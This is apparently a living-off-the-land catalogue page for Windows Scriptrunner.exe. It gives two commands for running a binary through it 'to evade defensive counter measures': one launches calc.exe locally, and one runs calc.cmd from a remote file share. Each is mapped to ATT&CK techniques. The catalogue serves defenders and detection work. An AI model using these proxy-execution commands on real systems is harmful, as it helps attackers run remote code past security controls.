.. /Scriptrunner.exe
Star

Execute (EXE, Remote, CMD)

Execute binary through proxy binary to evade defensive counter measures

Paths:

Resources:

Acknowledgements:

Detections:

Execute

  1. Executes calc.exe

    Scriptrunner.exe -appvscript calc.exe
    Use case
    Execute binary through proxy binary to evade defensive counter measures
    Privileges required
    User
    Operating systems
    Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    ATT&CK® technique
    T1202
    Tags
    Execute: EXE
  2. Executes calc.cmd from remote server

    ScriptRunner.exe -appvscript "\\fileserver\calc.cmd"
    Use case
    Execute binary through proxy binary from external server to evade defensive counter measures
    Privileges required
    User
    Operating systems
    Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    ATT&CK® technique
    T1218
    Tags
    Execute: Remote
    Execute: CMD